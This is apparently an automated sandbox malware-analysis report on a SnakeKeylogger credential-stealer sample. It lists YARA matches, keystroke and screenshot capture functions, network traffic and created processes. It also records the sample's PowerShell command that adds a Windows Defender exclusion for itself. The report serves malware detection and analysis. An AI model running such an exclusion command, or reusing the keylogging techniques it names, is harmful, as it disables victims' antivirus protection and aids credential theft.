https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003E90000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003CEC000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003F66000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002CC8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003C9F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003D14000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003E43000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003C7A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003E49000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003E1E000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003CA5000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003F41000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003CEF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002DB2000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002CC8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002DAD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/lB
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49764 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Contains functionality to capture screen (.Net source)
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3da9138.6.raw.unpack, COVID19.cs .Net Code: TakeScreenshot
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3f42e50.5.raw.unpack, COVID19.cs .Net Code: TakeScreenshot
Contains functionality to log keystrokes (.Net Source)
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3da9138.6.raw.unpack, COVID19.cs .Net Code: VKCodeToUnicode
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3f42e50.5.raw.unpack, COVID19.cs .Net Code: VKCodeToUnicode

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 4.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3f42e50.5.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3f42e50.5.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3f42e50.5.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3da9138.6.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3da9138.6.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3da9138.6.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3f42e50.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3f42e50.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3da9138.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3da9138.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000004.00000002.4169573077.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1738966608.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe PID: 7252, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe PID: 7472, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Detected potential crypto function
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Code function: 0_2_0128DA4C 0_2_0128DA4C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Code function: 0_2_052DB783 0_2_052DB783
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Code function: 0_2_052D91C0 0_2_052D91C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Code function: 0_2_052D7720 0_2_052D7720
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Code function: 0_2_052D7710 0_2_052D7710
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Code function: 0_2_052D91B0 0_2_052D91B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Code function: 0_2_052DFB40 0_2_052DFB40
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Code function: 0_2_07836F10 0_2_07836F10
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Code function: 0_2_07830478 0_2_07830478
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Code function: 0_2_07831C78 0_2_07831C78
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Code function: 0_2_078320A0 0_2_078320A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Code function: 0_2_078320B0 0_2_078320B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Code function: 0_2_07830040 0_2_07830040
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Code function: 4_2_00ECA088 4_2_00ECA088
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Code function: 4_2_00ECC19C 4_2_00ECC19C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Code function: 4_2_00ECD278 4_2_00ECD278
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Code function: 4_2_00EC5362 4_2_00EC5362
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Code function: 4_2_00ECC468 4_2_00ECC468
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Code function: 4_2_00ECC738 4_2_00ECC738
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Code function: 4_2_00EC69A0 4_2_00EC69A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Code function: 4_2_00ECE988 4_2_00ECE988
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Code function: 4_2_00ECCA08 4_2_00ECCA08
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Code function: 4_2_00ECCCD8 4_2_00ECCCD8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Code function: 4_2_00EC6FC8 4_2_00EC6FC8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Code function: 4_2_00ECCFAA 4_2_00ECCFAA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Code function: 4_2_00ECF630 4_2_00ECF630
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Code function: 4_2_00ECE97A 4_2_00ECE97A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Code function: 4_2_00ECFA88 4_2_00ECFA88
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Code function: 4_2_00EC3E09 4_2_00EC3E09
Sample file is different than original file name gathered from version info
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1743556585.00000000077A0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1737431170.0000000002D68000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1736065029.0000000000F3E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1738966608.0000000003D19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1738966608.0000000003D19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1737431170.0000000002D11000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4169573077.0000000000402000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4169824289.0000000000CF7000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUNKNOWN_FILET vs SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Binary or memory string: OriginalFilenameDtrB.exe0 vs SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe
Uses 32bit PE files
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 4.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3f42e50.5.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3f42e50.5.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3f42e50.5.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3da9138.6.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3da9138.6.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3da9138.6.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3f42e50.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3f42e50.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3da9138.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3da9138.6.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000004.00000002.4169573077.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1738966608.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe PID: 7252, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe PID: 7472, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3da9138.6.raw.unpack, COVID19.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3da9138.6.raw.unpack, VIPSeassion.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3da9138.6.raw.unpack, VIPSeassion.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3f42e50.5.raw.unpack, COVID19.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3f42e50.5.raw.unpack, VIPSeassion.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3f42e50.5.raw.unpack, VIPSeassion.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.77a0000.8.raw.unpack, Uel8r1lQF2PkteGZrv.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.77a0000.8.raw.unpack, Uel8r1lQF2PkteGZrv.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3fc7870.4.raw.unpack, Uel8r1lQF2PkteGZrv.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3fc7870.4.raw.unpack, Uel8r1lQF2PkteGZrv.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.77a0000.8.raw.unpack, E0RYX9X2eibsstJT2l.cs Security API names: _0020.SetAccessControl
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.77a0000.8.raw.unpack, E0RYX9X2eibsstJT2l.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.77a0000.8.raw.unpack, E0RYX9X2eibsstJT2l.cs Security API names: _0020.AddAccessRule
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3fc7870.4.raw.unpack, E0RYX9X2eibsstJT2l.cs Security API names: _0020.SetAccessControl
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3fc7870.4.raw.unpack, E0RYX9X2eibsstJT2l.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3fc7870.4.raw.unpack, E0RYX9X2eibsstJT2l.cs Security API names: _0020.AddAccessRule
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/6@3/3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.log Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7464:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bpzdcvwv.4oj.ps1 Jump to behavior
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe ReversingLabs: Detection: 28%
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: kernel.appcore.dll Jump to behavior
